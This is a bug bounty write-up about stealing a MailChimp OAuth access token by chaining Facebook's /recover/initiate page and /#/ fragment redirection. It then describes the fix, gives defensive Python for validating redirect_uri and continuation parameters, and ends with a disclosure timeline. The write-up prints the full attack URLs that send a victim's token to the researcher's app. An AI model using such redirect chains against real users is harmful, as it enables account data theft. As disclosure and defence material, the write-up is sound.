Stealing Facebook MailChimp Application OAuth 2.0 Access Token
This post is about a bug that I found in the Facebook MailChimp Application OAuth 2.0 flow which could have been used to steal the access_token. The original idea for this bug came from prakharprasad's blog post.
Facebook Ads Manager can import MailChimp customer data by using OAuth 2.0 to fetch the data into Facebook Ads Manager. The application is part of the MailChimp website and was developed by Facebook developers. Once the MailChimp user authorises the application, it sends the MailChimp data to Facebook Ads Manager.
OAuth Authorisation URL for Facebook Custom Audiences:
Request:
https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/
Response:
https://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0
First I tried to bypass redirect_uri but I couldn't. Then I tried the same OAuth flow while logged out of Facebook; it forced me to the login page.
https://www.facebook.com/login.php?next=https%3A%2F%2Fmailchimp-oauth.facebook.com%2Fads%2Fmanage%2Fcontact_importer_auth%2F#access_token=4uhbf9d433187acg50mk40cef13ec847&expires_in=0
But /#/ redirection will not work on the login.php page, so I needed to bypass the default login page. After some searching I finally found this URL which bypasses the default login page, and the /#/ redirection also worked here.
https://www.facebook.com/recover/initiate?hacked=1
MailChimp OAuth URL:
https://login.mailchimp.com/oauth2/authorize?client_id=112041070777&response_type=token&redirect_uri=http://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/#/n/?https://apps.facebook.com/redirectbug_mailchip
Shortened version of the above URL:
https://goo.gl/2Ep6BT
Final URL:
https://www.facebook.com/recover/initiate?hacked=1#/#/n/?business/url/?href=https://goo.gl/2Ep6BT&creative=1
When the victim clicks the above URL it redirects to the MailChimp OAuth page and asks for credentials. Once the login succeeds, the access token in the response is redirected to my Facebook app URL.
The Fix:
Now /#/ redirection will not work on the /recover/initiate/ page, so the token will not be redirected to another path.
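The chain above needs two weaknesses at once: an authorization server that accepts a redirect_uri carrying extra data (here a fragment), and a first-party page that forwards the browser to a URL chosen by the request while the token-bearing fragment is preserved. The following is an added example, not code from the post, from Facebook or from MailChimp, showing the two checks a defender would put on each side. It assumes hypothetical function names, a registered redirect URI stored over https (the post shows it over http), and the client_id taken from the post; all inputs in the demo are constructed.

```python
from urllib.parse import urlsplit, urlunsplit

# Constructed registry of client_id -> exact registered redirect URIs.
# The client_id is the one shown in the post; the URI is the post's
# redirect_uri with https assumed (the post shows it over http).
REGISTERED_REDIRECT_URIS = {
    "112041070777": {
        "https://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/",
    },
}


def validate_redirect_uri(client_id, redirect_uri):
    """Strict redirect_uri check for an OAuth 2.0 authorization endpoint.

    Returns (accepted, reason). RFC 6749 section 3.1.2 requires the redirect
    URI to be absolute and to carry no fragment, and comparing the whole
    string against the registered value (no prefix matching) means nothing
    appended by the requester, such as '#/n/?https://...', reaches the client.
    """
    registered = REGISTERED_REDIRECT_URIS.get(client_id)
    if not registered:
        return False, "unknown client_id"
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https":
        return False, "redirect_uri must use https"
    if parts.fragment:
        return False, "redirect_uri must not contain a fragment"
    if redirect_uri not in registered:
        return False, "redirect_uri does not exactly match a registered URI"
    return True, "ok"


def safe_continuation_target(next_value, site_host):
    """Reduce a post-login 'next' parameter to a same-site path, else '/'.

    Browsers keep the URL fragment across redirects, so a login or recovery
    page that forwards to an arbitrary URL lets an implicit-flow token in the
    fragment travel with it. Only same-host https URLs or plain relative
    paths are kept, fragments are dropped entirely, and scheme-relative or
    backslash-prefixed paths are rejected.
    """
    if not next_value:
        return "/"
    parts = urlsplit(next_value)
    if parts.fragment:
        return "/"
    if parts.scheme or parts.netloc:
        # Absolute (or scheme-relative) URL: allow only our own host over https.
        if parts.scheme != "https" or parts.netloc.lower() != site_host.lower():
            return "/"
    path = parts.path or "/"
    if not path.startswith("/") or path.startswith("//") or path.startswith("/\\"):
        return "/"
    return urlunsplit(("", "", path, parts.query, ""))


if __name__ == "__main__":
    # Constructed inputs: the registered URI, the same URI with a fragment
    # appended, and a login continuation that points at a subdomain.
    base = "https://mailchimp-oauth.facebook.com/ads/manage/contact_importer_auth/"
    print(validate_redirect_uri("112041070777", base))
    print(validate_redirect_uri("112041070777", base + "#/n/?https://apps.example/x"))
    print(safe_continuation_target("/ads/manage/", "www.facebook.com"))
    print(safe_continuation_target(base + "#access_token=abc", "www.facebook.com"))
```

The redirect_uri check is the authorization server's job and is what stops the fragment in the post's MailChimp OAuth URL from being echoed back; the continuation check is the job of every first-party page that accepts a "where to go next" parameter, such as login.php or /recover/initiate, and is what the fix described above amounts to.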
Timeline:
8 June 2017: Report sent
15 June 2017: Further investigation by Facebook
16 June 2017: Fixed by Facebook
22 June 2017: $500 bounty awarded by Facebook